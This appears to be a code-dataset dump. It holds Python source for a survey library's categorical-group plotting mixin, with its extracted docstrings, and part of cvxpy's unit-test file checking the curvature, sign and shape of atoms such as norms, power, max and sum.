                ax.set_xlabel(x_labels[self.find_key(item)])

    def plot_distribution_grid(
            self, n_rows: int, n_cols: int,
            fig_size: Optional[Tuple[int, int]] = (16, 9),
            filters: Optional[Dict[str, Any]] = None,
            titles: Union[str, List[str], Dict[str, str]] = '',
            x_labels: Union[str, List[str], Dict[str, str]] = '',
            drop: Optional[Union[str, List[str]]] = None,
            **kwargs
    ) -> Figure:
        """
        Plot a grid of distributions of the group's questions.

        :param n_rows: Number of rows in the grid.
        :param n_cols: Number of columns in the grid.
        :param fig_size: Size for the figure.
        :param filters: Optional filters to apply to each question before
                        plotting.
        :param titles: List of titles or dict mapping question keys or names to
                       titles.
        :param x_labels: List of x-axis labels or dict mapping question keys or
                         names to labels.
        :param drop: Optional category or categories to exclude from the plot.
        :param kwargs: Other kwargs to pass to each question's
                       plot_distribution() method.
        """
        fig, axes = plt.subplots(nrows=n_rows, ncols=n_cols,
                                 figsize=fig_size,
                                 sharex=self._share_x(), sharey='all')
        for i, item in enumerate(self.items):
            ax = axes.flat[i]
            if filters is not None:
                item = item.where(**filters)
            if drop is not None:
                item = item.drop(drop)
            item.plot_distribution(ax=ax, **kwargs)
            self._annotate_axes(ax, i, item, titles, x_labels)
        return fig

    def plot_comparison_grid(
            self,
            other: 'CategoricalGroupMixin',
            n_rows: int, n_cols: int,
            filters: Optional[Dict[str, Any]] = None,
            self_color: str = 'C0', other_color: str = 'C1',
            self_name: Optional[str] = None, other_name: Optional[str] = None,
            fig_size: Optional[Tuple[int, int]] = (16, 9),
            titles: Union[str, List[str], Dict[str, str]] = '',
            x_labels: Union[str, List[str], Dict[str, str]] = '',
            **kwargs) -> Figure:
        """
        Plot a grid of distributions of comparisons between the corresponding
        questions of 2 groups.

        :param other: The other group to use.
        :param n_rows: Number of rows in the grid.
        :param n_cols: Number of columns in the grid.
        :param self_color: Color for this group's plot items.
        :param other_color: Color for the other group's plot items.
        :param self_name: Name for this group's plot items.
        :param other_name: Name for the other group's plot items.
        :param fig_size: Size for the figure.
        :param filters: Optional filters to apply to each question before
                        plotting.
        :param titles: List of titles or dict mapping question keys or names to
                       titles.
        :param x_labels: List of x-axis labels or dict mapping question keys or
                         names to labels.
        :param kwargs: Other kwargs to pass to each question's
                       plot_distribution() method.
        """
        fig, axes = plt.subplots(
            nrows=n_rows, ncols=n_cols,
            figsize=fig_size,
            sharex=self._share_x(), sharey='all'
        )
        # Renaming must be all-or-nothing, and names must end up distinct
        if [self_name, other_name].count(None) not in (0, 2):
            raise ValueError(
                'Either rename both question groups or neither.'
            )
        if self_name is not None and self_name == other_name:
            raise ValueError(
                'Names of questions must be different to plot a comparison.'
            )
        for i, item in enumerate(self.items):
            ax = axes.flat[i]
            if self_name is None and other_name is None:
                if item.name == other.items[i].name:
                    raise ValueError('Names of questions must be different'
                                     ' to plot a comparison.')
            self_item = (
                item.rename(self_name) if self_name is not None else item
            )
            other_item = (
                other.items[i].rename(other_name) if other_name is not None
                else other.items[i]
            )
            if filters is not None:
                self_item = self_item.where(**filters)
                other_item = other_item.where(**filters)
            self_item.plot_comparison(
                other_item,
                ax=ax, self_color=self_color,
                other_color=other_color, **kwargs
            )
            self._annotate_axes(ax, i, item, titles, x_labels)
        return fig
|
import matplotlib.pyplot as plt
from matplotlib.figure import Figure
from typing import List, Union, Dict, Optional, Tuple, Any
from survey.mixins.data_types.categorical_mixin import CategoricalMixin
class CategoricalGroupMixin(object):
    """
    Mixin adding shared-category introspection and grid-plotting helpers
    to a group of Categorical questions.
    """
    # The Categorical questions that make up the group.
    items: List[CategoricalMixin]

    def _set_categories(self):
        """
        Set the Categories for the Group if all Categoricals in the Group have
        the same Categories; otherwise set the Group's categories to None.
        """
        ref_names = set(self.items[0].category_names)
        all_names = set([
            category_name for item in self.items
            for category_name in item.category_names
        ])
        if ref_names == all_names:
            self._categories = self.items[0].categories
        else:
            self._categories = None

    @property
    def categories(self) -> Optional[Union[List[str], Dict[str, int]]]:
        """
        Return the categories shared by all questions in the group, or None
        if the questions do not all share the same categories.
        """
        return self._categories

    @property
    def category_names(self) -> Optional[List[str]]:
        """
        Return the names of the shared categories, or None if the group has
        no shared categories.
        """
        if isinstance(self._categories, list):
            return self._categories
        elif isinstance(self._categories, dict):
            return list(self._categories.keys())
        else:
            return None

    @property
    def category_values(self) -> Optional[list]:
        """
        Return the values of the shared categories, or None if the group has
        no shared categories.
        """
        if isinstance(self._categories, list):
            return self._categories
        elif isinstance(self._categories, dict):
            return list(self._categories.values())
        else:
            return None

    def plot_distribution_grid(
            self, n_rows: int, n_cols: int,
            fig_size: Optional[Tuple[int, int]] = (16, 9),
            filters: Optional[Dict[str, Any]] = None,
            titles: Union[str, List[str], Dict[str, str]] = '',
            x_labels: Union[str, List[str], Dict[str, str]] = '',
            drop: Optional[Union[str, List[str]]] = None,
            **kwargs
    ) -> Figure:
        """
        Plot a grid of distributions of the group's questions.

        :param n_rows: Number of rows in the grid.
        :param n_cols: Number of columns in the grid.
        :param fig_size: Size for the figure.
        :param filters: Optional filters to apply to each question before
                        plotting.
        :param titles: List of titles or dict mapping question keys or names
                       to titles.
        :param x_labels: List of x-axis labels or dict mapping question keys
                         or names to labels.
        :param drop: Optional category or categories to exclude from the plot.
        :param kwargs: Other kwargs to pass to each question's
                       plot_distribution() method.
        """
        # Only share the x-axis when every question has the same categories.
        # BUG FIX: was self._questions[0]; the attribute is named `items`.
        categories = set(self.items[0].categories)
        share_x = 'all'
        for item in self.items[1:]:
            if set(item.categories) != categories:
                share_x = 'none'
        fig, axes = plt.subplots(nrows=n_rows, ncols=n_cols,
                                 figsize=fig_size,
                                 sharex=share_x, sharey='all')
        for i, item in enumerate(self.items):
            ax = axes.flat[i]
            if filters is not None:
                item = item.where(**filters)
            if drop is not None:
                item = item.drop(drop)
            item.plot_distribution(ax=ax, **kwargs)
            # Titles: a single string applies to all axes, a list is indexed
            # by position, and a dict is keyed by question name or group key.
            if isinstance(titles, str):
                ax.set_title(titles)
            elif isinstance(titles, list):
                ax.set_title(titles[i])
            elif isinstance(titles, dict):
                if item.name in titles.keys():
                    ax.set_title(titles[item.name])
                elif self.find_key(item) in titles.keys():
                    ax.set_title(titles[self.find_key(item)])
            if isinstance(x_labels, str):
                ax.set_xlabel(x_labels)
            elif isinstance(x_labels, list):
                ax.set_xlabel(x_labels[i])
            elif isinstance(x_labels, dict):
                if item.name in x_labels.keys():
                    ax.set_xlabel(x_labels[item.name])
                # BUG FIX: was checking titles.keys() for an x_labels lookup.
                elif self.find_key(item) in x_labels.keys():
                    ax.set_xlabel(x_labels[self.find_key(item)])
        return fig

    def plot_comparison_grid(
            self,
            other: 'CategoricalGroupMixin',
            n_rows: int, n_cols: int,
            filters: Optional[Dict[str, Any]] = None,
            self_color: str = 'C0', other_color: str = 'C1',
            self_name: Optional[str] = None, other_name: Optional[str] = None,
            fig_size: Optional[Tuple[int, int]] = (16, 9),
            titles: Union[str, List[str], Dict[str, str]] = '',
            x_labels: Union[str, List[str], Dict[str, str]] = '',
            **kwargs) -> Figure:
        """
        Plot a grid of distributions of comparisons between the corresponding
        questions of 2 groups.

        :param other: The other group to use.
        :param n_rows: Number of rows in the grid.
        :param n_cols: Number of columns in the grid.
        :param self_color: Color for this group's plot items.
        :param other_color: Color for the other group's plot items.
        :param self_name: Name for this group's plot items.
        :param other_name: Name for the other group's plot items.
        :param fig_size: Size for the figure.
        :param filters: Optional filters to apply to each question before
                        plotting.
        :param titles: List of titles or dict mapping question keys or names
                       to titles.
        :param x_labels: List of x-axis labels or dict mapping question keys
                         or names to labels.
        :param kwargs: Other kwargs to pass to each question's
                       plot_distribution() method.
        :raise ValueError: If only one of self_name / other_name is given, or
                           the two names are equal.
        """
        # Only share the x-axis when every question has the same categories.
        # BUG FIX: was self._questions[0]; the attribute is named `items`.
        categories = set(self.items[0].categories)
        share_x = 'all'
        for item in self.items[1:]:
            if set(item.categories) != categories:
                share_x = 'none'
        fig, axes = plt.subplots(
            nrows=n_rows, ncols=n_cols,
            figsize=fig_size,
            sharex=share_x, sharey='all'
        )
        if [self_name, other_name].count(None) not in (0, 2):
            raise ValueError(
                'Either rename both question groups or neither.'
            )
        if self_name is not None and self_name == other_name:
            raise ValueError(
                'Names of questions must be different to plot a comparison.'
            )
        for i, item in enumerate(self.items):
            ax = axes.flat[i]
            if self_name is None and other_name is None:
                if item.name == other.items[i].name:
                    raise ValueError('Names of questions must be different'
                                     ' to plot a comparison.')
            self_item = (
                item.rename(self_name) if self_name is not None else item
            )
            other_item = (
                other.items[i].rename(other_name) if other_name is not None
                else other.items[i]
            )
            if filters is not None:
                self_item = self_item.where(**filters)
                other_item = other_item.where(**filters)
            self_item.plot_comparison(
                other_item,
                ax=ax, self_color=self_color,
                other_color=other_color, **kwargs
            )
            if isinstance(titles, str):
                ax.set_title(titles)
            elif isinstance(titles, list):
                ax.set_title(titles[i])
            elif isinstance(titles, dict):
                if item.name in titles.keys():
                    ax.set_title(titles[item.name])
                elif self.find_key(item) in titles.keys():
                    ax.set_title(titles[self.find_key(item)])
            if isinstance(x_labels, str):
                ax.set_xlabel(x_labels)
            elif isinstance(x_labels, list):
                ax.set_xlabel(x_labels[i])
            elif isinstance(x_labels, dict):
                if item.name in x_labels.keys():
                    ax.set_xlabel(x_labels[item.name])
                # BUG FIX: was checking titles.keys() for an x_labels lookup.
                elif self.find_key(item) in x_labels.keys():
                    ax.set_xlabel(x_labels[self.find_key(item)])
        return fig
|
en
| 0.782896
|
Set the Categories for the Group if all Categoricals in the Group have the same Categories. Return the categories. Return the names of the categories. Return the values of the categories. Plot a grid of distributions of the group's questions. :param n_rows: Number of rows in the grid. :param n_cols: Number of columns in the grid. :param fig_size: Size for the figure. :param filters: Optional filters to apply to each question before plotting. :param titles: List of titles or dict mapping question keys or names to titles. :param x_labels: List of x-axis labels or dict mapping question keys or names to labels. :param drop: Optional category or categories to exclude from the plot. :param kwargs: Other kwargs to pass to each question's plot_distribution() method. Plot a grid of distributions of comparisons between the corresponding questions of 2 groups. :param other: The other group to use. :param n_rows: Number of rows in the grid. :param n_cols: Number of columns in the grid. :param self_color: Color for this group's plot items. :param other_color: Color for the other group's plot items. :param self_name: Name for this group's plot items. :param other_name: Name for the other group's plot items. :param fig_size: Size for the figure. :param filters: Optional filters to apply to each question before plotting. :param titles: List of titles or dict mapping question keys or names to titles. :param x_labels: List of x-axis labels or dict mapping question keys or names to labels. :param kwargs: Other kwargs to pass to each question's plot_distribution() method.
| 3.05656
| 3
|
cvxpy/tests/test_atoms.py
|
rpradal/cvxpy
| 0
|
6628526
|
"""
Copyright 2013 <NAME>
Licensed under the Apache License, Version 2.0 (the "License");
you may not use this file except in compliance with the License.
You may obtain a copy of the License at
http://www.apache.org/licenses/LICENSE-2.0
Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and
limitations under the License.
"""
import cvxpy as cp
import cvxpy.settings as s
from cvxpy.transforms.partial_optimize import partial_optimize
from cvxpy.expressions.variable import Variable
from cvxpy.expressions.constants import Parameter, Constant
from cvxpy.reductions.solvers.defines import INSTALLED_MI_SOLVERS
import numpy as np
from cvxpy import Problem, Minimize
from cvxpy.tests.base_test import BaseTest
import unittest
import scipy.sparse as sp
import scipy.stats
class TestAtoms(BaseTest):
""" Unit tests for the atoms module. """
    def setUp(self) -> None:
        """Create the scalar, vector, and matrix Variables shared by tests."""
        self.a = Variable(name='a')
        self.x = Variable(2, name='x')
        self.y = Variable(2, name='y')
        self.A = Variable((2, 2), name='A')
        self.B = Variable((2, 2), name='B')
        self.C = Variable((3, 2), name='C')
    def test_add_expr_copy(self) -> None:
        """Test the copy function for AddExpresion class.
        """
        atom = self.x + self.y
        copy = atom.copy()
        self.assertTrue(type(copy) is type(atom))
        # A new object is constructed, so copy.args == atom.args but copy.args
        # is not atom.args.
        self.assertEqual(copy.args, atom.args)
        self.assertFalse(copy.args is atom.args)
        self.assertEqual(copy.get_data(), atom.get_data())
        # Test copy with new args
        copy = atom.copy(args=[self.A, self.B])
        self.assertTrue(type(copy) is type(atom))
        self.assertTrue(copy.args[0] is self.A)
        self.assertTrue(copy.args[1] is self.B)
        self.assertEqual(copy.get_data(), atom.get_data())
    def test_norm_inf(self) -> None:
        """Test the norm_inf class.
        """
        exp = self.x+self.y
        atom = cp.norm_inf(exp)
        # self.assertEqual(atom.name(), "norm_inf(x + y)")
        self.assertEqual(atom.shape, tuple())
        self.assertEqual(atom.curvature, s.CONVEX)
        assert atom.is_convex()
        # The negation of a convex atom is concave.
        assert (-atom).is_concave()
        self.assertEqual(cp.norm_inf(atom).curvature, s.CONVEX)
        self.assertEqual(cp.norm_inf(-atom).curvature, s.CONVEX)
    def test_norm1(self) -> None:
        """Test the norm1 class.
        """
        exp = self.x+self.y
        atom = cp.norm1(exp)
        # self.assertEqual(atom.name(), "norm1(x + y)")
        self.assertEqual(atom.shape, tuple())
        self.assertEqual(atom.curvature, s.CONVEX)
        # norm1 composed with convex or negated-convex input stays convex.
        self.assertEqual(cp.norm1(atom).curvature, s.CONVEX)
        self.assertEqual(cp.norm1(-atom).curvature, s.CONVEX)
    def test_list_input(self) -> None:
        """Test that list input is rejected.
        """
        # NOTE(review): the parenthesised literal below is ONE string built by
        # implicit concatenation, so `in` performs a substring test rather
        # than membership in a tuple of alternatives — confirm intended.
        with self.assertRaises(Exception) as cm:
            cp.max([cp.Variable(), 1])
        self.assertTrue(str(cm.exception) in (
            "The input must be a single CVXPY Expression, not a list. "
            "Combine Expressions using atoms such as bmat, hstack, and vstack."))
        with self.assertRaises(Exception) as cm:
            cp.norm([1, cp.Variable()])
        self.assertTrue(str(cm.exception) in (
            "The input must be a single CVXPY Expression, not a list. "
            "Combine Expressions using atoms such as bmat, hstack, and vstack."))
        x = cp.Variable()
        y = cp.Variable()
        with self.assertRaises(Exception) as cm:
            cp.norm([x, y]) <= 1
        self.assertTrue(str(cm.exception) in (
            "The input must be a single CVXPY Expression, not a list. "
            "Combine Expressions using atoms such as bmat, hstack, and vstack."))
    def test_quad_form(self) -> None:
        """Test quad_form atom.
        """
        # A symmetric Parameter with unknown sign makes the curvature of
        # x'Px unknown, so the expression is not DCP.
        P = Parameter((2, 2), symmetric=True)
        expr = cp.quad_form(self.x, P)
        assert not expr.is_dcp()
    def test_power(self) -> None:
        """Test the power class.

        Checks the curvature and sign of power(x, p) over representative
        exponents, and the copy() protocol of the resulting atom.
        """
        from fractions import Fraction
        for shape in [(1, 1), (3, 1), (2, 3)]:
            x = Variable(shape)
            y = Variable(shape)
            exp = x + y
            for p in 0, 1, 2, 3, 2.7, .67, -1, -2.3, Fraction(4, 5):
                atom = cp.power(exp, p)
                self.assertEqual(atom.shape, shape)
                # Curvature depends on the exponent: convex for p > 1 or
                # p < 0, affine for p == 1, constant for p == 0, and
                # concave for 0 < p < 1.
                if p > 1 or p < 0:
                    self.assertEqual(atom.curvature, s.CONVEX)
                elif p == 1:
                    self.assertEqual(atom.curvature, s.AFFINE)
                elif p == 0:
                    self.assertEqual(atom.curvature, s.CONSTANT)
                else:
                    self.assertEqual(atom.curvature, s.CONCAVE)
                if p != 1:
                    self.assertEqual(atom.sign, s.NONNEG)
                # Test copy with args=None
                copy = atom.copy()
                self.assertTrue(type(copy) is type(atom))
                # A new object is constructed, so copy.args == atom.args but copy.args
                # is not atom.args.
                self.assertEqual(copy.args, atom.args)
                self.assertFalse(copy.args is atom.args)
                self.assertEqual(copy.get_data(), atom.get_data())
                # Test copy with new args
                copy = atom.copy(args=[self.y])
                self.assertTrue(type(copy) is type(atom))
                self.assertTrue(copy.args[0] is self.y)
                self.assertEqual(copy.get_data(), atom.get_data())
        assert cp.power(-1, 2).value == 1
# Test the geo_mean class.
    def test_geo_mean(self) -> None:
        """Test the geo_mean class: shape, curvature, sign, and copy()."""
        atom = cp.geo_mean(self.x)
        self.assertEqual(atom.shape, tuple())
        self.assertEqual(atom.curvature, s.CONCAVE)
        self.assertEqual(atom.sign, s.NONNEG)
        # Test copy with args=None
        copy = atom.copy()
        self.assertTrue(type(copy) is type(atom))
        # A new object is constructed, so copy.args == atom.args but copy.args
        # is not atom.args.
        self.assertEqual(copy.args, atom.args)
        self.assertFalse(copy.args is atom.args)
        self.assertEqual(copy.get_data(), atom.get_data())
        # Test copy with new args
        copy = atom.copy(args=[self.y])
        self.assertTrue(type(copy) is type(atom))
        self.assertTrue(copy.args[0] is self.y)
        self.assertEqual(copy.get_data(), atom.get_data())
# Test the harmonic_mean class.
    def test_harmonic_mean(self) -> None:
        """Test the harmonic_mean class: shape, curvature, and sign."""
        atom = cp.harmonic_mean(self.x)
        self.assertEqual(atom.shape, tuple())
        self.assertEqual(atom.curvature, s.CONCAVE)
        self.assertEqual(atom.sign, s.NONNEG)
# Test the pnorm class.
    def test_pnorm(self) -> None:
        """Test the pnorm class.

        pnorm is convex for p >= 1 (including infinity) and concave for
        p < 1 (including negative p); it is nonnegative in all cases.
        """
        atom = cp.pnorm(self.x, p=1.5)
        self.assertEqual(atom.shape, tuple())
        self.assertEqual(atom.curvature, s.CONVEX)
        self.assertEqual(atom.sign, s.NONNEG)
        atom = cp.pnorm(self.x, p=1)
        self.assertEqual(atom.shape, tuple())
        self.assertEqual(atom.curvature, s.CONVEX)
        self.assertEqual(atom.sign, s.NONNEG)
        atom = cp.pnorm(self.x, p=2)
        self.assertEqual(atom.shape, tuple())
        self.assertEqual(atom.curvature, s.CONVEX)
        self.assertEqual(atom.sign, s.NONNEG)
        # Axis-wise norm returns one value per column.
        expr = cp.norm(self.A, 2, axis=0)
        self.assertEqual(expr.shape, (2,))
        # p may be given as the strings 'inf'/'Inf' or as np.inf.
        atom = cp.pnorm(self.x, p='inf')
        self.assertEqual(atom.shape, tuple())
        self.assertEqual(atom.curvature, s.CONVEX)
        self.assertEqual(atom.sign, s.NONNEG)
        atom = cp.pnorm(self.x, p='Inf')
        self.assertEqual(atom.shape, tuple())
        self.assertEqual(atom.curvature, s.CONVEX)
        self.assertEqual(atom.sign, s.NONNEG)
        atom = cp.pnorm(self.x, p=np.inf)
        self.assertEqual(atom.shape, tuple())
        self.assertEqual(atom.curvature, s.CONVEX)
        self.assertEqual(atom.sign, s.NONNEG)
        atom = cp.pnorm(self.x, p=.5)
        self.assertEqual(atom.shape, tuple())
        self.assertEqual(atom.curvature, s.CONCAVE)
        self.assertEqual(atom.sign, s.NONNEG)
        atom = cp.pnorm(self.x, p=.7)
        self.assertEqual(atom.shape, tuple())
        self.assertEqual(atom.curvature, s.CONCAVE)
        self.assertEqual(atom.sign, s.NONNEG)
        atom = cp.pnorm(self.x, p=-.1)
        self.assertEqual(atom.shape, tuple())
        self.assertEqual(atom.curvature, s.CONCAVE)
        self.assertEqual(atom.sign, s.NONNEG)
        atom = cp.pnorm(self.x, p=-1)
        self.assertEqual(atom.shape, tuple())
        self.assertEqual(atom.curvature, s.CONCAVE)
        self.assertEqual(atom.sign, s.NONNEG)
        atom = cp.pnorm(self.x, p=-1.3)
        self.assertEqual(atom.shape, tuple())
        self.assertEqual(atom.curvature, s.CONCAVE)
        self.assertEqual(atom.sign, s.NONNEG)
        # Test copy with args=None
        copy = atom.copy()
        self.assertTrue(type(copy) is type(atom))
        # A new object is constructed, so copy.args == atom.args but copy.args
        # is not atom.args.
        self.assertEqual(copy.args, atom.args)
        self.assertFalse(copy.args is atom.args)
        self.assertEqual(copy.get_data(), atom.get_data())
        # Test copy with new args
        copy = atom.copy(args=[self.y])
        self.assertTrue(type(copy) is type(atom))
        self.assertTrue(copy.args[0] is self.y)
        self.assertEqual(copy.get_data(), atom.get_data())
def test_matrix_norms(self) -> None:
"""
Matrix 1-norm, 2-norm (sigma_max), infinity-norm,
Frobenius norm, and nuclear-norm.
"""
for p in [1, 2, np.inf, 'fro', 'nuc']:
for var in [self.A, self.C]:
atom = cp.norm(var, p)
self.assertEqual(atom.shape, tuple())
self.assertEqual(atom.curvature, s.CONVEX)
self.assertEqual(atom.sign, s.NONNEG)
var.value = np.random.randn(*var.shape)
self.assertAlmostEqual(atom.value, np.linalg.norm(var.value, ord=p))
pass
    def test_quad_over_lin(self) -> None:
        """Test DCP properties and shape validation of quad_over_lin."""
        # Test quad_over_lin DCP.
        atom = cp.quad_over_lin(cp.square(self.x), self.a)
        self.assertEqual(atom.curvature, s.CONVEX)
        atom = cp.quad_over_lin(-cp.square(self.x), self.a)
        self.assertEqual(atom.curvature, s.CONVEX)
        # A concave numerator makes the composition non-DCP.
        atom = cp.quad_over_lin(cp.sqrt(self.x), self.a)
        self.assertEqual(atom.curvature, s.UNKNOWN)
        assert not atom.is_dcp()
        # Test quad_over_lin shape validation.
        with self.assertRaises(Exception) as cm:
            cp.quad_over_lin(self.x, self.x)
        self.assertEqual(str(cm.exception),
                         "The second argument to quad_over_lin must be a scalar.")
    def test_elemwise_arg_count(self) -> None:
        """Test arg count for max and min variants.
        """
        # The tuple of messages covers both Python 2 and Python 3 wording.
        with self.assertRaises(Exception) as cm:
            cp.maximum(1)
        self.assertTrue(str(cm.exception) in (
            "__init__() takes at least 3 arguments (2 given)",
            "__init__() missing 1 required positional argument: 'arg2'"))
        with self.assertRaises(Exception) as cm:
            cp.minimum(1)
        self.assertTrue(str(cm.exception) in (
            "__init__() takes at least 3 arguments (2 given)",
            "__init__() missing 1 required positional argument: 'arg2'"))
    def test_matrix_frac(self) -> None:
        """Test for the matrix_frac atom.
        """
        atom = cp.matrix_frac(self.x, self.A)
        self.assertEqual(atom.shape, tuple())
        self.assertEqual(atom.curvature, s.CONVEX)
        # Test matrix_frac shape validation.
        with self.assertRaises(Exception) as cm:
            cp.matrix_frac(self.x, self.C)
        self.assertEqual(str(cm.exception),
                         "The second argument to matrix_frac must be a square matrix.")
        with self.assertRaises(Exception) as cm:
            cp.matrix_frac(Variable(3), self.A)
        self.assertEqual(str(cm.exception),
                         "The arguments to matrix_frac have incompatible dimensions.")
    def test_max(self) -> None:
        """Test max.
        """
        # One arg, test sign.
        self.assertEqual(cp.max(1).sign, s.NONNEG)
        self.assertEqual(cp.max(-2).sign, s.NONPOS)
        self.assertEqual(cp.max(Variable()).sign, s.UNKNOWN)
        self.assertEqual(cp.max(0).sign, s.ZERO)
        # Test with axis argument.
        self.assertEqual(cp.max(Variable(2), axis=0, keepdims=True).shape, (1,))
        self.assertEqual(cp.max(Variable(2), axis=1).shape, (2,))
        self.assertEqual(cp.max(Variable((2, 3)), axis=0, keepdims=True).shape, (1, 3))
        self.assertEqual(cp.max(Variable((2, 3)), axis=1).shape, (2,))
        # Invalid axis.
        with self.assertRaises(Exception) as cm:
            cp.max(self.x, axis=4)
        self.assertEqual(str(cm.exception),
                         "Invalid argument for axis.")
    def test_min(self) -> None:
        """Test min.
        """
        # One arg, test sign.
        self.assertEqual(cp.min(1).sign, s.NONNEG)
        self.assertEqual(cp.min(-2).sign, s.NONPOS)
        self.assertEqual(cp.min(Variable()).sign, s.UNKNOWN)
        self.assertEqual(cp.min(0).sign, s.ZERO)
        # Test with axis argument.
        self.assertEqual(cp.min(Variable(2), axis=0).shape, tuple())
        self.assertEqual(cp.min(Variable(2), axis=1).shape, (2,))
        self.assertEqual(cp.min(Variable((2, 3)), axis=0).shape, (3,))
        self.assertEqual(cp.min(Variable((2, 3)), axis=1).shape, (2,))
        # Invalid axis.
        with self.assertRaises(Exception) as cm:
            cp.min(self.x, axis=4)
        self.assertEqual(str(cm.exception),
                         "Invalid argument for axis.")
# Test sign logic for maximum.
    def test_maximum_sign(self) -> None:
        """Test sign logic for maximum: the result's sign is the max of
        the argument signs, with promotion of scalars to vectors."""
        # Two args.
        self.assertEqual(cp.maximum(1, 2).sign, s.NONNEG)
        self.assertEqual(cp.maximum(1, Variable()).sign, s.NONNEG)
        self.assertEqual(cp.maximum(1, -2).sign, s.NONNEG)
        self.assertEqual(cp.maximum(1, 0).sign, s.NONNEG)
        self.assertEqual(cp.maximum(Variable(), 0).sign, s.NONNEG)
        self.assertEqual(cp.maximum(Variable(), Variable()).sign, s.UNKNOWN)
        self.assertEqual(cp.maximum(Variable(), -2).sign, s.UNKNOWN)
        self.assertEqual(cp.maximum(0, 0).sign, s.ZERO)
        self.assertEqual(cp.maximum(0, -2).sign, s.ZERO)
        self.assertEqual(cp.maximum(-3, -2).sign, s.NONPOS)
        # Many args.
        self.assertEqual(cp.maximum(-2, Variable(), 0, -1, Variable(), 1).sign,
                         s.NONNEG)
        # Promotion.
        self.assertEqual(cp.maximum(1, Variable(2)).sign,
                         s.NONNEG)
        self.assertEqual(cp.maximum(1, Variable(2)).shape,
                         (2,))
# Test sign logic for minimum.
    def test_minimum_sign(self) -> None:
        """Test sign logic for minimum: the result's sign is the min of
        the argument signs, with promotion of scalars to vectors."""
        # Two args.
        self.assertEqual(cp.minimum(1, 2).sign, s.NONNEG)
        self.assertEqual(cp.minimum(1, Variable()).sign, s.UNKNOWN)
        self.assertEqual(cp.minimum(1, -2).sign, s.NONPOS)
        self.assertEqual(cp.minimum(1, 0).sign, s.ZERO)
        self.assertEqual(cp.minimum(Variable(), 0).sign, s.NONPOS)
        self.assertEqual(cp.minimum(Variable(), Variable()).sign, s.UNKNOWN)
        self.assertEqual(cp.minimum(Variable(), -2).sign, s.NONPOS)
        self.assertEqual(cp.minimum(0, 0).sign, s.ZERO)
        self.assertEqual(cp.minimum(0, -2).sign, s.NONPOS)
        self.assertEqual(cp.minimum(-3, -2).sign, s.NONPOS)
        # Many args.
        self.assertEqual(cp.minimum(-2, Variable(), 0, -1, Variable(), 1).sign,
                         s.NONPOS)
        # Promotion.
        self.assertEqual(cp.minimum(-1, Variable(2)).sign,
                         s.NONPOS)
        self.assertEqual(cp.minimum(-1, Variable(2)).shape,
                         (2,))
    def test_sum(self) -> None:
        """Test the sum atom.
        """
        self.assertEqual(cp.sum(1).sign, s.NONNEG)
        self.assertEqual(cp.sum(Constant([1, -1])).sign, s.UNKNOWN)
        self.assertEqual(cp.sum(Constant([1, -1])).curvature, s.CONSTANT)
        self.assertEqual(cp.sum(Variable(2)).sign, s.UNKNOWN)
        self.assertEqual(cp.sum(Variable(2)).shape, tuple())
        self.assertEqual(cp.sum(Variable(2)).curvature, s.AFFINE)
        self.assertEqual(cp.sum(Variable((2, 1)), keepdims=True).shape, (1, 1))
        # Mixed curvature.
        mat = np.array([[1, -1]])
        self.assertEqual(cp.sum(mat @ cp.square(Variable(2))).curvature, s.UNKNOWN)
        # Test with axis argument.
        self.assertEqual(cp.sum(Variable(2), axis=0).shape, tuple())
        self.assertEqual(cp.sum(Variable(2), axis=1).shape, (2,))
        self.assertEqual(cp.sum(Variable((2, 3)), axis=0, keepdims=True).shape, (1, 3))
        self.assertEqual(cp.sum(Variable((2, 3)), axis=0, keepdims=False).shape, (3,))
        self.assertEqual(cp.sum(Variable((2, 3)), axis=1).shape, (2,))
        # Invalid axis.
        with self.assertRaises(Exception) as cm:
            cp.sum(self.x, axis=4)
        self.assertEqual(str(cm.exception),
                         "Invalid argument for axis.")
        # Summing a sparse matrix also works.
        A = sp.eye(3)
        self.assertEqual(cp.sum(A).value, 3)
        A = sp.eye(3)
        self.assertItemsAlmostEqual(cp.sum(A, axis=0).value, [1, 1, 1])
    def test_multiply(self) -> None:
        """Test the multiply atom.
        """
        self.assertEqual(cp.multiply([1, -1], self.x).sign, s.UNKNOWN)
        self.assertEqual(cp.multiply([1, -1], self.x).curvature, s.AFFINE)
        self.assertEqual(cp.multiply([1, -1], self.x).shape, (2,))
        # The sign of the product follows the signs of the parameters.
        pos_param = Parameter(2, nonneg=True)
        neg_param = Parameter(2, nonpos=True)
        self.assertEqual(cp.multiply(pos_param, pos_param).sign, s.NONNEG)
        self.assertEqual(cp.multiply(pos_param, neg_param).sign, s.NONPOS)
        self.assertEqual(cp.multiply(neg_param, neg_param).sign, s.NONNEG)
        self.assertEqual(cp.multiply(neg_param, cp.square(self.x)).curvature, s.CONCAVE)
        # Test promotion.
        self.assertEqual(cp.multiply([1, -1], 1).shape, (2,))
        self.assertEqual(cp.multiply(1, self.C).shape, self.C.shape)
        self.assertEqual(cp.multiply(self.x, [1, -1]).sign, s.UNKNOWN)
        self.assertEqual(cp.multiply(self.x, [1, -1]).curvature, s.AFFINE)
        self.assertEqual(cp.multiply(self.x, [1, -1]).shape, (2,))
# Test the vstack class.
    def test_vstack(self) -> None:
        """Test the vstack class: names, shapes, and dimension validation."""
        atom = cp.vstack([self.x, self.y, self.x])
        self.assertEqual(atom.name(), "Vstack(x, y, x)")
        self.assertEqual(atom.shape, (3, 2))
        atom = cp.vstack([self.A, self.C, self.B])
        self.assertEqual(atom.name(), "Vstack(A, C, B)")
        self.assertEqual(atom.shape, (7, 2))
        # Stacking scalar entries yields a column vector.
        entries = []
        for i in range(self.x.shape[0]):
            entries.append(self.x[i])
        atom = cp.vstack(entries)
        self.assertEqual(atom.shape, (2, 1))
        # self.assertEqual(atom[1,0].name(), "vstack(x[0,0], x[1,0])[1,0]")
        with self.assertRaises(Exception) as cm:
            cp.vstack([self.C, 1])
        self.assertEqual(str(cm.exception),
                         "All the input dimensions except for axis 0 must match exactly.")
        with self.assertRaises(Exception) as cm:
            cp.vstack([self.x, Variable(3)])
        self.assertEqual(str(cm.exception),
                         "All the input dimensions except for axis 0 must match exactly.")
        # Calling vstack with no arguments is a TypeError.
        with self.assertRaises(TypeError) as cm:
            cp.vstack()
    def test_reshape(self) -> None:
        """Test the reshape class.
        """
        expr = cp.reshape(self.A, (4, 1))
        self.assertEqual(expr.sign, s.UNKNOWN)
        self.assertEqual(expr.curvature, s.AFFINE)
        self.assertEqual(expr.shape, (4, 1))
